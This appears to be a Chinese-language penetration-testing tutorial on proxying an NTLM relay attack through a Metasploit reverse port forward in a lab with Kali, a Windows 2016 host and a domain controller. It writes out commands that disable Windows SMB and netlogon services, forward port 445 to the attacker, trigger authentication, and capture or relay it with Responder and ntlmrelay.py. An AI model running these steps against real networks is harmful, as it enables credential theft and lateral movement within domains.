我们可以通过使用MSF端口转发的功能来代理Ntlm Relay。
测试环境如下:
kali 192.168.213.149win2016 10.10.211.133 192.168.213.157dc 10.10.211.130
我们这台kali机器是无法访问10.10.211.0/24这个网段的。
现在比如说我们拿到了win2016这台机器,需要来做Ntlm Relay的话,就需要端口转发了,这也算是第二种方式吧。
但是这种方式我感觉挺玄学的,有时候测试是可以成功的,但是有时候不行。
首先我们需要运行的所有服务以使其释放,如下命令。
sc stop netlogonsc stop lanmanserversc config lanmanserver start= disabledsc stop lanmanworkstationsc config lanmanworkstation start= disabled
执行完成之后重启,那么你肯定想问实战中总不可能直接重启吧,这就是玄学所在,因为我尝试过没有重启也可以成功。
执行完成之后,我们做一个端口转发。
将目标的445端口转发到我们本地的445.
portfwd add -R -L 0.0.0.0 -l 445 -p 445现在我们在DC这里也就是10.10.211.130这里使用dir进行触发。
dir \\10.10.211.133\share使用Responder进行监听。
这里指定的网卡是lo 也就是127.0.0.1 表示本地。
responder -I lo当我们请求10.10.211.133的445端口的时候,他会转发到我们本地的445。
我们使用ntlmrelay.py也是一样的。
因为我这里只有两台机器,所以我们将中继给10.10.211.130 但是还是在10.10.211.130中触发。
当我们触发的时候可以看到已经有请求过来了。
如果感兴趣的话可以去测测关闭服务之后不重启看能不能生效。
快来找我学习吧!!!
